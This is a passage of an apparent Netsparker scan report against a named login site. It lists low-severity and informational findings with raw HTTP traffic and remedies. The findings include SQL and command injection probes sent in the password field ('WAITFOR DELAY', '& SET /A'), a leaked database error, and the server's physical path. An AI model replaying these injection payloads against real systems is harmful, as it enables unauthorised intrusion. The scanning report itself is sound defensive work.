MainForm.action = "Exec_ResetAndEmail.asp";
MainForm.submit();
}
}
function Handle_ResetPass () {
var MainForm = document.getElementById("frm");
MainForm.action = "Exec_Reset.asp";
MainForm.submit();
}
</script>
<link rel="stylesheet" type="text/css" href="../../App_Themes/Default/vindico2.css">
<style type="text/css">
body {
margin: 10px;
}
.divMessage {
margin-bottom: 8px;
font-weight: bold;
background-color: #d4e5ae;
border: 1px solid green;
color: black;
padding: 6px;
}
</style>
</head>
<body>
<div style="float: right;"><a style="color:blue;" href="#close" onclick="window.close();">close window</a></div>
<h3>VINDICO Password Reset</h3>
<form name = "frm" id="frm" action = "" method = "Post" autocomplete="off">
<table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;">
<tr>
<td nowrap><strong>username (email):</strong></td>
<td width="100%">
<input id="username" type ="text" value= "" name="username">
</td>
</tr>
<tr>
<td nowrap><strong>current password:</strong></td>
<td width="100%">
<input type ="password" name="existingPassword" value= "">
</td>
</tr>
<tr>
<td nowrap><strong>new password:</strong></td>
<td width="100%">
<input type ="password" name="newPassword" value="">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="button" value="reset password" onclick = "Handle_ResetPass();">
</td>
</tr>
<tr>
<td colspan=2>
<hr noshade size="1">
</td>
</tr>
<tr>
<td colspan="2">
If you <strong>can't remember your password, enter your username</strong>
(should be your email address)
in the username field above. Then, <strong>click 'Reset and Email'</strong>
and an email will be sent containing your new password.
<br><br>
<input type="button" value="reset and email" onclick = "Handle_EmailPass();">
</td>
</tr>
<tr>
<td colspan=2>
</td>
</tr>
<tr>
<td>
</td>
</tr>
</table>
<hr noshade size="1">
</form>
</body>
</html>
Cache-Control: private
Content-Length: 3603
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
<title>Password Reset</title>
<script type="text/javascript">
function Handle_EmailPass () {
var MainForm = document.getElementById("frm");
var username = document.getElementById("username").value;
if (username == "") {
alert("A username/email address is required to reset the password.");
return;
} else {
MainForm.action = "Exec_ResetAndEmail.asp";
MainForm.submit();
}
}
function Handle_ResetPass () {
var MainForm = document.getElementById("frm");
MainForm.action = "Exec_Reset.asp";
MainForm.submit();
}
</script>
<link rel="stylesheet" type="text/css" href="../../App_Themes/Default/vindico2.css">
<style type="text/css">
body {
margin: 10px;
}
.divMessage {
margin-bottom: 8px;
font-weight: bold;
background-color: #d4e5ae;
border: 1px solid green;
color: black;
padding: 6px;
}
</style>
</head>
<body>
<div style="float: right;"><a style="color:blue;" href="#close" onclick="window.close();">close window</a></div>
<h3>VINDICO Password Reset</h3>
<form name = "frm" id="frm" action = "" method = "Post" autocomplete="off">
<table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;">
<tr>
<td nowrap><strong>username (email):</strong></td>
<td width="100%">
<input id="username" type ="text" value= "" name="username">
</td>
</tr>
<tr>
<td nowrap><strong>current password:</strong></td>
<td width="100%">
<input type ="password" name="existingPassword" value= "">
</td>
</tr>
<tr>
<td nowrap><strong>new password:</strong></td>
<td width="100%">
<input type ="password" name="newPassword" value="">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="button" value="reset password" onclick = "Handle_ResetPass();">
</td>
</tr>
<tr>
<td colspan=2>
<hr noshade size="1">
</td>
</tr>
<tr>
<td colspan="2">
If you <strong>can't remember your password, enter your username</strong>
(should be your email address)
in the username field above. Then, <strong>click 'Reset and Email'</strong>
and an email will be sent containing your new password.
<br><br>
<input type="button" value="reset and email" onclick = "Handle_EmailPass();">
</td>
</tr>
<tr>
<td colspan=2>
</td>
</tr>
<tr>
<td>
</td>
</tr>
</table>
<hr noshade size="1">
</form>
</body>
</html>
Auto Complete Enabled
Auto Complete Enabled
1
TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.Remedy
Add the attribute
autocomplete="off" to the form tag or to individual "input" fields.Actions to Take
- See the remedy for the solution.
- Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
- Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
|
- /
/ CONFIRMED |
Identified Field Name
password
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=PPKJIJIDINJNLPIILBMAFGNB; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2"></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=PPKJIJIDINJNLPIILBMAFGNB; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2"></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
1
TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Remedy
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
External References
|
- /
/ CONFIRMED |
Identified Cookie
ASPSESSIONIDSQCRCQDD
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=PPKJIJIDINJNLPIILBMAFGNB; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2"></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQCRCQDD=PPKJIJIDINJNLPIILBMAFGNB; path=/
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2"></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
Database Error Message
Database Error Message
1
TOTAL
LOW
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Remedy
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
|
- /vindico_dynamic.asp
/vindico_dynamic.asp |
Parameters
| Parameter | Type | Value |
| password | POST | '& SET /A 0xFFF9999-2 & |
| username | POST | Smith |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 63
Accept-Encoding: gzip, deflate
password=%27%26%20SET%20%2FA%200xFFF9999-2%20%26&username=Smith
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 63
Accept-Encoding: gzip, deflate
password=%27%26%20SET%20%2FA%200xFFF9999-2%20%26&username=Smith
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Incorrect syntax near '&'.</div>
Cache-Control: private
Content-Length: 139
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Incorrect syntax near '&'.</div>
Forbidden Resource
Forbidden Resource
1
TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
|
- /AccountManager/
/AccountManager/ CONFIRMED |
Request
GET /AccountManager/ HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/AccountManager/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\AccountManager\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/AccountManager/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\AccountManager\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
Microsoft SQL Server Identified
Microsoft SQL Server Identified
1
TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft SQL Server as backend database. This issue is reported for information purposes only.
Impact
This issue is reported as additional information only, there is no direct impact arising from this issue.
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 60
Accept-Encoding: gzip, deflate
password=%27;WAITFOR%20DELAY%20%270:0:25%27--&username=Smith
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 60
Accept-Encoding: gzip, deflate
password=%27;WAITFOR%20DELAY%20%270:0:25%27--&username=Smith
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
IIS Version Disclosure
IIS Version Disclosure
1
TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.
Impact
An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.
